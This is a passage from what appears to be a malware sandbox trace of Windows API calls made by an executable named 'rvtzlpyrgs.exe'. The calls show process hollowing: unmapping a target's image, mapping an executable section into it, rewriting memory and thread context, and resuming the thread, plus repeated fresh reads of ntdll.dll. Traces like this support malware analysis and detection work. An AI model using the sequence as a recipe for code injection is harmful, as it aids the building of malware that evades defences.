[247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x1, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0xcc, [257]=0x68, [258]=0x6d, [259]=0x75, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xe0, [273]=0xab, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x70, [285]=0xac, [286]=0x19, [287]=0x0, [288]=0xfa, [289]=0xab, [290]=0x7e, [291]=0x77, [292]=0x1, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0xcc, [297]=0x68, [298]=0x6d, [299]=0x75, [300]=0xe9, [301]=0xac, [302]=0x7e, [303]=0x77, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x88, [381]=0xa6, [382]=0x4e, [383]=0x0, [384]=0x98, [385]=0x3b, [386]=0x4f, [387]=0x0, [388]=0x88, [389]=0x3e, [390]=0x4f, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x64, [397]=0xac, [398]=0x19, [399]=0x0, [400]=0x68, [401]=0x5, [402]=0x79, [403]=0x77, [404]=0x0, [405]=0x0, [406]=0x4e, [407]=0x0, [408]=0x88, [409]=0x3e, [410]=0x4f, [411]=0x0, [412]=0x90, [413]=0x3e, [414]=0x4f, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x98, [433]=0x3b, [434]=0x4f, [435]=0x0, [436]=0xe, [437]=0x0, [438]=0x6, [439]=0x0, [440]=0x88, [441]=0xa6, [442]=0x4e, [443]=0x0, [444]=0x6, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x8c, [449]=0xac, [450]=0x19, [451]=0x0, [452]=0x79, [453]=0x4, [454]=0x79, [455]=0x77, [456]=0x0, [457]=0x0, [458]=0xa7, [459]=0xd4, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x1, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0xad, [474]=0x19, [475]=0x0, [476]=0xcc, [477]=0xac, [478]=0x19, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x38, [489]=0xad, [490]=0x19, [491]=0x0, [492]=0x15, [493]=0xda, [494]=0x62, [495]=0x75, [496]=0x38, [497]=0xad, [498]=0x19, [499]=0x0, [500]=0x36, [501]=0xda, [502]=0x62, [503]=0x75, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0060.168] ReadProcessMemory (in: hProcess=0x1fc, lpBaseAddress=0x214008, lpBuffer=0x19ad38, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19ad38*, lpNumberOfBytesRead=0x0) returned 1 [0060.168] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19a590 | out: Wow64Process=0x19a590*=1) returned 1 [0060.169] lstrlenW (lpString="rvtzlpyrgs.exe") returned 14 [0060.169] lstrlenW (lpString="ntdll.dll") returned 9 [0060.169] lstrlenW (lpString="ntdll.dll") returned 9 [0060.169] lstrlenW (lpString="ntdll.dll") returned 9 [0060.169] lstrlenW (lpString="ntdll.dll") returned 9 [0060.169] lstrlenW (lpString="tdll.dll") returned 8 [0060.169] lstrlenW (lpString="dll.dll") returned 7 [0060.169] lstrlenW (lpString="ll.dll") returned 6 [0060.170] lstrlenW (lpString="l.dll") returned 5 [0060.170] lstrlenW (lpString=".dll") returned 4 [0060.170] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0060.170] GetFileSize (in: hFile=0x204, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0060.170] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000 [0060.203] ReadFile (in: hFile=0x204, lpBuffer=0x2350000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19a564, lpOverlapped=0x0 | out: lpBuffer=0x2350000*, lpNumberOfBytesRead=0x19a564*=0x1784a0, lpOverlapped=0x0) returned 1 [0060.396] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x24d0000 [0060.426] CloseHandle (hObject=0x204) returned 1 [0060.426] VirtualFree (lpAddress=0x2350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.460] VirtualFree (lpAddress=0x24d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.484] NtUnmapViewOfSection (ProcessHandle=0x1fc, BaseAddress=0x400000) returned 0x0 [0060.485] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19a54c | out: Wow64Process=0x19a54c*=1) returned 1 [0060.485] lstrlenW (lpString="rvtzlpyrgs.exe") returned 14 [0060.485] lstrlenW (lpString="ntdll.dll") returned 9 [0060.485] lstrlenW (lpString="ntdll.dll") returned 9 [0060.485] lstrlenW (lpString="ntdll.dll") returned 9 [0060.485] lstrlenW (lpString="ntdll.dll") returned 9 [0060.485] lstrlenW (lpString="tdll.dll") returned 8 [0060.485] lstrlenW (lpString="dll.dll") returned 7 [0060.485] lstrlenW (lpString="ll.dll") returned 6 [0060.485] lstrlenW (lpString="l.dll") returned 5 [0060.485] lstrlenW (lpString=".dll") returned 4 [0060.486] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0060.486] GetFileSize (in: hFile=0x204, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0060.486] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000 [0060.486] ReadFile (in: hFile=0x204, lpBuffer=0x2350000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19a520, lpOverlapped=0x0 | out: lpBuffer=0x2350000*, lpNumberOfBytesRead=0x19a520*=0x1784a0, lpOverlapped=0x0) returned 1 [0060.550] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x24d0000 [0060.605] CloseHandle (hObject=0x204) returned 1 [0060.606] VirtualFree (lpAddress=0x2350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.630] VirtualFree (lpAddress=0x24d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.650] NtCreateSection (in: SectionHandle=0x19a590, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x19ace8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19a590*=0x204) returned 0x0 [0060.651] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19a520 | out: Wow64Process=0x19a520*=1) returned 1 [0060.651] lstrlenW (lpString="rvtzlpyrgs.exe") returned 14 [0060.651] lstrlenW (lpString="ntdll.dll") returned 9 [0060.651] lstrlenW (lpString="ntdll.dll") returned 9 [0060.651] lstrlenW (lpString="ntdll.dll") returned 9 [0060.651] lstrlenW (lpString="ntdll.dll") returned 9 [0060.651] lstrlenW (lpString="tdll.dll") returned 8 [0060.651] lstrlenW (lpString="dll.dll") returned 7 [0060.651] lstrlenW (lpString="ll.dll") returned 6 [0060.652] lstrlenW (lpString="l.dll") returned 5 [0060.652] lstrlenW (lpString=".dll") returned 4 [0060.652] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0060.653] GetFileSize (in: hFile=0x200, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0060.653] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000 [0060.653] ReadFile (in: hFile=0x200, lpBuffer=0x2350000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19a4f4, lpOverlapped=0x0 | out: lpBuffer=0x2350000*, lpNumberOfBytesRead=0x19a4f4*=0x1784a0, lpOverlapped=0x0) returned 1 [0060.695] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x24d0000 [0060.730] CloseHandle (hObject=0x200) returned 1 [0060.731] VirtualFree (lpAddress=0x2350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.753] VirtualFree (lpAddress=0x24d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.785] NtMapViewOfSection (in: SectionHandle=0x204, ProcessHandle=0x1fc, BaseAddress=0x19a584*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19a57c*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19a584*=0x400000, SectionOffset=0x0, ViewSize=0x19a57c*=0xa2000) returned 0x0 [0060.797] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19a520 | out: Wow64Process=0x19a520*=1) returned 1 [0060.797] lstrlenW (lpString="rvtzlpyrgs.exe") returned 14 [0060.797] lstrlenW (lpString="ntdll.dll") returned 9 [0060.797] lstrlenW (lpString="ntdll.dll") returned 9 [0060.797] lstrlenW (lpString="ntdll.dll") returned 9 [0060.797] lstrlenW (lpString="ntdll.dll") returned 9 [0060.797] lstrlenW (lpString="tdll.dll") returned 8 [0060.797] lstrlenW (lpString="dll.dll") returned 7 [0060.797] lstrlenW (lpString="ll.dll") returned 6 [0060.797] lstrlenW (lpString="l.dll") returned 5 [0060.797] lstrlenW (lpString=".dll") returned 4 [0060.797] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0060.798] GetFileSize (in: hFile=0x200, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0060.798] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000 [0060.798] ReadFile (in: hFile=0x200, lpBuffer=0x2350000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19a4f4, lpOverlapped=0x0 | out: lpBuffer=0x2350000*, lpNumberOfBytesRead=0x19a4f4*=0x1784a0, lpOverlapped=0x0) returned 1 [0060.839] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x24d0000 [0060.877] CloseHandle (hObject=0x200) returned 1 [0060.877] VirtualFree (lpAddress=0x2350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.901] VirtualFree (lpAddress=0x24d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.935] NtMapViewOfSection (in: SectionHandle=0x204, ProcessHandle=0xffffffffffffffff, BaseAddress=0x19a584*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19a57c*=0xa2000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19a584*=0x2350000, SectionOffset=0x0, ViewSize=0x19a57c*=0xa2000) returned 0x0 [0060.947] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19a560 | out: Wow64Process=0x19a560*=1) returned 1 [0060.947] lstrlenW (lpString="rvtzlpyrgs.exe") returned 14 [0060.947] lstrlenW (lpString="ntdll.dll") returned 9 [0060.947] lstrlenW (lpString="ntdll.dll") returned 9 [0060.947] lstrlenW (lpString="ntdll.dll") returned 9 [0060.947] lstrlenW (lpString="ntdll.dll") returned 9 [0060.947] lstrlenW (lpString="tdll.dll") returned 8 [0060.948] lstrlenW (lpString="dll.dll") returned 7 [0060.948] lstrlenW (lpString="ll.dll") returned 6 [0060.948] lstrlenW (lpString="l.dll") returned 5 [0060.948] lstrlenW (lpString=".dll") returned 4 [0060.948] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0060.948] GetFileSize (in: hFile=0x200, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0060.948] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2400000 [0060.948] ReadFile (in: hFile=0x200, lpBuffer=0x2400000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19a534, lpOverlapped=0x0 | out: lpBuffer=0x2400000*, lpNumberOfBytesRead=0x19a534*=0x1784a0, lpOverlapped=0x0) returned 1 [0060.984] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2580000 [0061.026] CloseHandle (hObject=0x200) returned 1 [0061.026] VirtualFree (lpAddress=0x2400000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.069] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.091] NtWriteVirtualMemory (in: ProcessHandle=0x1fc, BaseAddress=0x214008, Buffer=0x19ad64*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19a594 | out: Buffer=0x19ad64*, NumberOfBytesWritten=0x19a594*=0x4) returned 0x0 [0061.096] SetThreadContext (hThread=0x1f8, lpContext=0x19a9d8*(ContextFlags=0x10007, Dr0=0x4f3e90, Dr1=0x19a9f4, Dr2=0x77792bfe, Dr3=0x0, Dr6=0x19acd8, Dr7=0x64, FloatSave.ControlWord=0x19ac60, FloatSave.StatusWord=0x77792929, FloatSave.TagWord=0x4f3e98, FloatSave.ErrorOffset=0x19aa50, FloatSave.ErrorSelector=0x64, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x19ad50, FloatSave.RegisterArea=([0]=0xb4, [1]=0x29, [2]=0x79, [3]=0x77, [4]=0x98, [5]=0x3e, [6]=0x4f, [7]=0x0, [8]=0xb8, [9]=0x3e, [10]=0x76, [11]=0x77, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x1, [16]=0x90, [17]=0x3e, [18]=0x4f, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x64, [25]=0x0, [26]=0x8, [27]=0x2, [28]=0x50, [29]=0xaa, [30]=0x19, [31]=0x0, [32]=0x50, [33]=0xaa, [34]=0x19, [35]=0x0, [36]=0xf0, [37]=0xac, [38]=0x19, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x64, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x2, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x43, [65]=0x0, [66]=0x3a, [67]=0x0, [68]=0x5c, [69]=0x0, [70]=0x55, [71]=0x0, [72]=0x73, [73]=0x0, [74]=0x65, [75]=0x0, [76]=0x72, [77]=0x0, [78]=0x73, [79]=0x0), FloatSave.Cr0NpxState=0x52005c, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x214000, Edx=0x0, Ecx=0x0, Eax=0x4139de, Ebp=0x0, Eip=0x777d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x6e, [1]=0x0, [2]=0x62, [3]=0x0, [4]=0x79, [5]=0x0, [6]=0x74, [7]=0x0, [8]=0x6c, [9]=0x0, [10]=0x2e, [11]=0x0, [12]=0x73, [13]=0x0, [14]=0x6d, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x1, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0xcc, [257]=0x68, [258]=0x6d, [259]=0x75, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xe0, [273]=0xab, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x70, [285]=0xac, [286]=0x19, [287]=0x0, [288]=0xfa, [289]=0xab, [290]=0x7e, [291]=0x77, [292]=0x1, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0xcc, [297]=0x68, [298]=0x6d, [299]=0x75, [300]=0xe9, [301]=0xac, [302]=0x7e, [303]=0x77, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x88, [381]=0xa6, [382]=0x4e, [383]=0x0, [384]=0x98, [385]=0x3b, [386]=0x4f, [387]=0x0, [388]=0x88, [389]=0x3e, [390]=0x4f, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x64, [397]=0xac, [398]=0x19, [399]=0x0, [400]=0x68, [401]=0x5, [402]=0x79, [403]=0x77, [404]=0x0, [405]=0x0, [406]=0x4e, [407]=0x0, [408]=0x88, [409]=0x3e, [410]=0x4f, [411]=0x0, [412]=0x90, [413]=0x3e, [414]=0x4f, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x98, [433]=0x3b, [434]=0x4f, [435]=0x0, [436]=0xe, [437]=0x0, [438]=0x6, [439]=0x0, [440]=0x88, [441]=0xa6, [442]=0x4e, [443]=0x0, [444]=0x6, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x8c, [449]=0xac, [450]=0x19, [451]=0x0, [452]=0x79, [453]=0x4, [454]=0x79, [455]=0x77, [456]=0x0, [457]=0x0, [458]=0xa7, [459]=0xd4, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x1, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0xad, [474]=0x19, [475]=0x0, [476]=0xcc, [477]=0xac, [478]=0x19, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x38, [489]=0xad, [490]=0x19, [491]=0x0, [492]=0x15, [493]=0xda, [494]=0x62, [495]=0x75, [496]=0x38, [497]=0xad, [498]=0x19, [499]=0x0, [500]=0x36, [501]=0xda, [502]=0x62, [503]=0x75, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0061.097] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19a588 | out: Wow64Process=0x19a588*=1) returned 1 [0061.098] lstrlenW (lpString="rvtzlpyrgs.exe") returned 14 [0061.098] lstrlenW (lpString="ntdll.dll") returned 9 [0061.098] lstrlenW (lpString="ntdll.dll") returned 9 [0061.098] lstrlenW (lpString="ntdll.dll") returned 9 [0061.098] lstrlenW (lpString="ntdll.dll") returned 9 [0061.098] lstrlenW (lpString="tdll.dll") returned 8 [0061.098] lstrlenW (lpString="dll.dll") returned 7 [0061.098] lstrlenW (lpString="ll.dll") returned 6 [0061.098] lstrlenW (lpString="l.dll") returned 5 [0061.098] lstrlenW (lpString=".dll") returned 4 [0061.098] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0061.098] GetFileSize (in: hFile=0x200, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0061.098] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2400000 [0061.099] ReadFile (in: hFile=0x200, lpBuffer=0x2400000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19a55c, lpOverlapped=0x0 | out: lpBuffer=0x2400000*, lpNumberOfBytesRead=0x19a55c*=0x1784a0, lpOverlapped=0x0) returned 1 [0061.127] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2580000 [0061.160] CloseHandle (hObject=0x200) returned 1 [0061.160] VirtualFree (lpAddress=0x2400000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.235] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.258] NtResumeThread (in: ThreadHandle=0x1f8, SuspendCount=0x19a5a4 | out: SuspendCount=0x19a5a4*=0x1) returned 0x0 [0061.258] CloseHandle (hObject=0x1fc) returned 1 [0061.258] CloseHandle (hObject=0x1f8) returned 1 [0061.258] CloseHandle (hObject=0x204) returned 1 [0061.258] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19a590 | out: Wow64Process=0x19a590*=1) returned 1 [0061.259] lstrlenW (lpString="rvtzlpyrgs.exe") returned 14 [0061.259] lstrlenW (lpString="ntdll.dll") returned 9 [0061.259] lstrlenW (lpString="ntdll.dll") returned 9 [0061.259] lstrlenW (lpString="ntdll.dll") returned 9 [0061.259] lstrlenW (lpString="ntdll.dll") returned 9 [0061.259] lstrlenW (lpString="tdll.dll") returned 8 [0061.259] lstrlenW (lpString="dll.dll") returned 7 [0061.259] lstrlenW (lpString="ll.dll") returned 6 [0061.259] lstrlenW (lpString="l.dll") returned 5 [0061.259] lstrlenW (lpString=".dll") returned 4 [0061.259] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0061.259] GetFileSize (in: hFile=0x204, lpFileSizeHigh=0x0 | out: 